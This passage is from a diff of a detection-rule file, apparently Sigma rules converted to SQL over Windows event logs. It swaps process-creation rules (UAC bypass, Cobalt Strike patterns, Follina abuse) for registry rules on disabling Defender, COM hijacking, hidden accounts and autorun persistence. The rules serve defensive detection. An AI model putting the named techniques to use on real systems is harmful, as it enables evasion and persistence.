"registry_set_asep_reg_keys_modification_wow6432node_classes.yml" }, { - "title": "Potential UAC Bypass Via Sdclt.EXE", - "id": "40f9af16-589d-4984-b78d-8c2aec023197", - "status": "test", - "description": "A General detection for sdclt being spawned as an elevated process. 
This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "status": "experimental", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_sdclt.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the 
MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using 
dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "status": "experimental", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", - "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.t1574", + 
"cve.2021.1675" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_susp_printer_driver.yml" 
}, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1574.001" + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue 
LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "title": "Potential PowerShell Execution Policy Tampering", + "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (NewValue LIKE '%Bypass%' ESCAPE '\\' OR NewValue LIKE '%RemoteSigned%' ESCAPE '\\' OR NewValue LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT 
(((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_powershell_execution_policy.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", - "id": "9fbf5927-5261-4284-a71d-f681029ea574", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate activity is expected since compressing files with a password is common." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_password_compression.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Wow6432Node CurrentVersion Autorun Keys Modification", + "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Administrative scripts" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (NewValue LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR NewValue = 'grpconv -o' OR NewValue LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND NewValue LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND NewValue LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program 
Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND NewValue LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND NewValue LIKE '% /burn.runonce' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": 
"Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1564.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Unusually Long PowerShell CommandLine", - "id": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", - "status": "test", - "description": "Detects unusually long PowerShell command lines with a length of 1000 characters or more", - "author": "oscd.community, Natalia Shornikova", + "title": "Activate Suppression of Windows Security Center Notifications", + "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "status": "experimental", + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.dll' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows Powershell' OR Product = 'PowerShell Core 6') AND CommandLine REGEXP '.{1000,}')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_abnormal_commandline_size.yml" + "filename": "registry_set_suppress_defender_notifications.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Suspicious Application Allowed Through 
Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": 